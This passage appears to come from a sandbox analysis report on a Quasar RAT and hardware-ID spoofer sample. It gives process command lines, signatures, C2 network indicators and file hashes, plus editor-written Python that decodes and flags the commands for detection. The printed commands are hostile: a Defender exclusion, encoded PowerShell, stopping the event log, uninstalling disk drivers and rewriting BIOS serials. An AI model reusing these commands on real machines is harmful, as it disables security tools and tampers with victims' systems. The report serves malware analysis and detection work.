"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: M4I8-GMHJ

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 4NL2-IHDE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 4NL2-IHDE

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: E7H3-L20O

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: E7H3-L20O

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: 5ODZ-8IZ1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: 5ODZ-8IZ1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: B319-ZT36

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: B319-ZT36

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: E7F9-L7C9

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: E7F9-L7C9

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 45NC-UMFA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 45NC-UMFA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 7O6P-3ZMS

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 7O6P-3ZMS

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 9AZV-GF4V

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 9AZV-GF4V

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: ZKGR-ZOP3

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: ZKGR-ZOP3

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: O38K-RLEI

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: O38K-RLEI

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 8FZG-IIZK

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 8FZG-IIZK
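The command lines above are what a detection engineer would write rules against, and the one -EncodedCommand among them is the only place where a rule on the raw command line would miss. The Python below is an added example (the editor's code, not the sandbox's tooling and not the malware author's): it decodes the -EncodedCommand payload exactly as it appears in the Processes list, strips the <# #> filler so the real Add-MpPreference call is visible, and runs a small rule set over a verbatim subset of the command lines above. The sample lines are copied from this report; the tag names, regexes and ATT&CK mappings are my assumptions and deliberately narrow.

```python
"""Command-line triage over the process tree of this report.

Added example for this page: the editor's code, not the sandbox's own tooling.
The sample command lines are copied verbatim from the behavioral1 Processes
section; the rule set, tag names and ATT&CK mappings are editor assumptions.
"""
import base64
import re
from collections import defaultdict

# Constructed sample: a verbatim subset of the report's command lines.
SAMPLE_CMDLINES = [
    r"""schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\conhost.exe'" /rl HIGHEST /f""",
    "\"powershell\" -Command Add-MpPreference -ExclusionPath 'C:\\Windows\\TAPI\\System.exe'",
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAbQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZQB4ACMAPgA="''',
    r'''C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"''',
    r"C:\Windows\system32\sc.exe stop eventlog",
    r"C:\Windows\system32\sc.exe stop wuauserv",
    r"wusa /uninstall /kb:890830 /quiet /norestart",
    r"C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0",
    r"C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF",
    r"C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: NZME-9H4D",
    r'''C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""''',
    r"ping -n 10 localhost",
    r"""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force""",
]

# powershell.exe accepts -e / -ec / -enc as abbreviations of -EncodedCommand.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[\"']?([A-Za-z0-9+/=]+)", re.I)
PS_BLOCK_COMMENT_RE = re.compile(r"<#.*?#>", re.S)

# (tag, ATT&CK technique or None, pattern). Mappings are editor assumptions.
RULES = [
    ("defender_exclusion", "T1562.001",
     re.compile(r"Add-MpPreference\b.*-Exclusion(?:Path|Extension|Process)\b", re.I)),
    ("scheduled_task", "T1053.005",
     re.compile(r"\bschtasks(?:\.exe)?\s+/create\b", re.I)),
    ("scheduled_task_highest", "T1053.005",
     re.compile(r"\bschtasks(?:\.exe)?\s+/create\b.*\s/rl\s+HIGHEST\b", re.I)),
    ("service_create", "T1543.003",
     re.compile(r"\bsc(?:\.exe)?\s+create\b", re.I)),
    ("update_service_stop", "T1489",
     re.compile(r"\bsc(?:\.exe)?\s+stop\s+(?:wuauserv|bits|dosvc|WaaSMedicSvc|UsoSvc)\b", re.I)),
    ("eventlog_stop", "T1562.002",
     re.compile(r"\bsc(?:\.exe)?\s+stop\s+eventlog\b", re.I)),
    ("msrt_uninstall", "T1562.001",
     re.compile(r"\bwusa\b.*/uninstall\b.*/kb:890830\b", re.I)),
    ("sleep_disabled", None,
     re.compile(r"\bpowercfg(?:\.exe)?\s+/x\s+-(?:standby|hibernate)-timeout-(?:ac|dc)\s+0\b", re.I)),
    ("hwid_tamper", None,
     re.compile(r"\b(?:AMIDEWINx64|Volumeid64|DevManView)\.exe\b", re.I)),
]


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), else None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def strip_ps_block_comments(script):
    """Remove <# ... #> fillers and collapse whitespace so the real command shows."""
    return " ".join(PS_BLOCK_COMMENT_RE.sub(" ", script).split())


def classify(cmdline):
    """Sorted rule tags for one command line; encoded payloads are matched decoded."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else strip_ps_block_comments(decoded)
    tags = {tag for tag, _tid, pat in RULES if pat.search(text)}
    if decoded is not None:
        tags.add("encoded_command")
    return sorted(tags)


def technique_for(tag):
    """ATT&CK technique id for a tag, or None where no clean mapping exists."""
    return next((tid for t, tid, _ in RULES if t == tag), None)


def triage(cmdlines):
    """Group command lines by the tags they trigger: {tag: [cmdline, ...]}."""
    hits = defaultdict(list)
    for line in cmdlines:
        for tag in classify(line):
            hits[tag].append(line)
    return dict(hits)


if __name__ == "__main__":
    for tag, lines in sorted(triage(SAMPLE_CMDLINES).items()):
        print(f"{tag:24} {technique_for(tag) or '-':10} {len(lines)} hit(s)")
        for line in lines:
            print("    " + line[:110])
```

Run as a script it prints one line per tag with its hit count. The point of matching on the decoded payload rather than the raw command line is visible on the encoded entry: the raw line contains no "Add-MpPreference" at all, and even the decoded script only matches once the `<#...#>` blocks between the tokens are removed.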

Network

Country Destination Domain Proto
US 8.8.8.8:53 brofisthej.ddns.net udp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 gaming7core.info udp
RU 45.15.156.156:80 gaming7core.info tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
RU 45.15.156.156:80 gaming7core.info tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
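The table above is all the network evidence this run produced, and most of it is the sandbox resolver answering lookups rather than the malware talking to anything. The Python below is an added example (the editor's code, not the sandbox's): it parses those rows, separates the resolver's DNS lookups from real connections, extracts the IOC set, and ranks destinations with a small heuristic so the C2 candidate stands out. The rows are copied from the table; the row format, the dynamic-DNS suffix list, the resolver allowlist and the scoring weights are my assumptions.

```python
"""Network IOC extraction from the report's Network table.

Added example for this page: the editor's code, not the sandbox's. The rows
are copied from the behavioral1 Network section; the row format, the
dynamic-DNS suffix list, the resolver allowlist and the scoring weights
are editor assumptions.
"""
import re
from collections import Counter

# Copied from the Network section: Country Destination Domain Proto.
NETWORK_ROWS = """\
US 8.8.8.8:53 brofisthej.ddns.net udp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 gaming7core.info udp
RU 45.15.156.156:80 gaming7core.info tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
RU 45.15.156.156:80 gaming7core.info tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
"""

ROW_RE = re.compile(
    r"^(?P<cc>[A-Z]{2})\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s+"
    r"(?P<domain>[A-Za-z0-9.-]+)\s+(?P<proto>tcp|udp)$")
RESOLVERS = {"8.8.8.8"}                                   # sandbox DNS (assumption)
DDNS_SUFFIXES = (".ddns.net", ".no-ip.org", ".no-ip.com", ".duckdns.org")  # assumption
COMMON_PORTS = {80, 443}


def parse_rows(text):
    """Parse 'CC ip:port domain proto' lines into dicts; unparseable lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            row = m.groupdict()
            row["port"] = int(row["port"])
            rows.append(row)
    return rows


def is_dns_lookup(row):
    """True for the sandbox resolver's UDP/53 rows, which are lookups, not contacts."""
    return row["proto"] == "udp" and row["port"] == 53 and row["ip"] in RESOLVERS


def extract_iocs(rows):
    """Unique domains, contacted IPs and ip:port sockets, resolver left out."""
    conns = [r for r in rows if not is_dns_lookup(r)]
    return {
        "domains": sorted({r["domain"] for r in rows}),
        "ips": sorted({r["ip"] for r in conns}),
        "sockets": sorted({f'{r["ip"]}:{r["port"]}' for r in conns}),
    }


def rank_destinations(rows):
    """Score each contacted destination: dynamic DNS +2, non-80/443 port +2,
    +1 per repeat session. Highest score first."""
    counts = Counter((r["domain"], r["ip"], r["port"], r["proto"])
                     for r in rows if not is_dns_lookup(r))
    ranked = []
    for (domain, ip, port, proto), n in counts.items():
        flags = []
        if domain.lower().endswith(DDNS_SUFFIXES):
            flags.append("dynamic_dns")
        if port not in COMMON_PORTS:
            flags.append("nonstandard_port")
        if n > 1:
            flags.append("repeated")
        score = 2 * ("dynamic_dns" in flags) + 2 * ("nonstandard_port" in flags) + (n - 1)
        ranked.append({"domain": domain, "ip": ip, "port": port, "proto": proto,
                       "connections": n, "flags": flags, "score": score})
    ranked.sort(key=lambda d: (-d["score"], d["domain"]))
    return ranked


if __name__ == "__main__":
    rows = parse_rows(NETWORK_ROWS)
    print(extract_iocs(rows))
    for d in rank_destinations(rows):
        print(f'{d["score"]:2} {d["domain"]:22} {d["ip"]}:{d["port"]} x{d["connections"]} {d["flags"]}')
```

On this table the ranking puts brofisthej.ddns.net at 2.70.186.204:4822 on top (dynamic DNS, non-standard port, four sessions) and leaves ipinfo.io, pastebin.com and apps.identrust.com at zero; the heuristic is only a sort order for an analyst, not a verdict, and the resolver allowlist has to be adjusted to whatever DNS server the sandbox in question uses.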

Files

memory/2380-2-0x0000000002040000-0x0000000002080000-memory.dmp

memory/2380-1-0x0000000074C90000-0x000000007523B000-memory.dmp

memory/2380-0-0x0000000074C90000-0x000000007523B000-memory.dmp

memory/1204-9-0x00000000003A0000-0x00000000006C4000-memory.dmp

memory/2380-18-0x0000000074C90000-0x000000007523B000-memory.dmp

memory/2380-17-0x000000000BF70000-0x000000000CDE4000-memory.dmp

memory/2084-20-0x0000000000400000-0x0000000001274000-memory.dmp

memory/2084-21-0x000000007EBD0000-0x000000007EFA1000-memory.dmp

memory/1204-22-0x000000001AA70000-0x000000001AAF0000-memory.dmp

memory/2004-56-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp

memory/2004-58-0x000000001AF10000-0x000000001AF90000-memory.dmp

memory/2084-59-0x000000007EBD0000-0x000000007EFA1000-memory.dmp

memory/2732-66-0x0000000002A90000-0x0000000002AD0000-memory.dmp

memory/2732-70-0x0000000002A90000-0x0000000002AD0000-memory.dmp

memory/1264-75-0x00000000009C0000-0x0000000000CE4000-memory.dmp

memory/1264-76-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp

memory/1264-77-0x000000001B1E0000-0x000000001B260000-memory.dmp

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

MD5 1421378b1fa1b2bec518c7b05c137359
SHA1 f9434edd2d2519865f650ad4983722b84b006310
SHA256 9536b587fa1b06be4579cfb144cdb5d0ee43e265647a4d1e02205e0c845ed9d1
SHA512 fee464b29fc498dc58d9553b26a3818e95713682fc0072deca0a6e86027a168d4e2b55cb90c226e0b55d13f565d9fd3c42863a7ae1a8f2f3d797ce3d79adb599

memory/2732-72-0x0000000002A90000-0x0000000002AD0000-memory.dmp

memory/2004-79-0x0000000000300000-0x000000000030E000-memory.dmp

memory/1204-80-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp

memory/2004-81-0x0000000077720000-0x0000000077721000-memory.dmp

memory/2732-85-0x00000000745C0000-0x0000000074B6B000-memory.dmp

memory/2004-86-0x0000000077700000-0x0000000077701000-memory.dmp

memory/2004-90-0x0000000000310000-0x000000000031E000-memory.dmp

memory/2004-94-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp

memory/2004-96-0x00000000005C0000-0x00000000005CC000-memory.dmp

memory/2004-97-0x000000001AF10000-0x000000001AF90000-memory.dmp

memory/2004-99-0x0000000000610000-0x000000000061E000-memory.dmp

memory/2004-101-0x0000000000620000-0x000000000062C000-memory.dmp

memory/2004-103-0x00000000776B0000-0x00000000776B1000-memory.dmp

memory/2004-107-0x000000001AF10000-0x000000001AF90000-memory.dmp

memory/2004-110-0x000000001AF10000-0x000000001AF90000-memory.dmp

memory/2004-118-0x000000001AF10000-0x000000001AF90000-memory.dmp

memory/2004-111-0x000000001AF10000-0x000000001AF90000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 afee842ff36d649e3a1756770bad94c0
SHA1 4d95482ee57bdc9e0c80bad91a7d1f2009ad8621
SHA256 964440431e83dfd5fd24d020381ca01ac978a9caa4222b20a42516edf2e51029
SHA512 99715d5e262fe341df4524339c8626119dedbc448cafa9aa2e624c59c9bb49aa84499e1504c7825f73ffd0cb80a57457ae5ce3324b040da79f8ec45ebbd9543c

C:\Users\Admin\AppData\Local\Temp\s3KUFe101b.bat

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\ProgramData\Microsoft\Windows\DevManView.cfg

C:\ProgramData\Microsoft\Windows\Disk.bat

\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-05 11:46

Reported

2024-01-05 11:50

Platform

win10v2004-20231215-en

Max time kernel

64s

Max time network

172s

Command Line

"C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe

"C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe

"C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAbQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZQB4ACMAPgA="

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"

C:\Users\Admin\AppData\Roaming\conhost_sft.exe

"C:\Users\Admin\AppData\Roaming\conhost_sft.exe"

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

"C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe"

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: JZH3-KRJ1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: JZH3-KRJ1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28756HP-TRGT27103AB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428769HP-TRGT4560FA

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328772HP-TRGT15309DQ

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728772HP-TRGT15309MST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628769HP-TRGT4560FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528769HP-TRGT4560SL

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828769HP-TRGT4560SG

C:\Windows\system32\cmd.exe

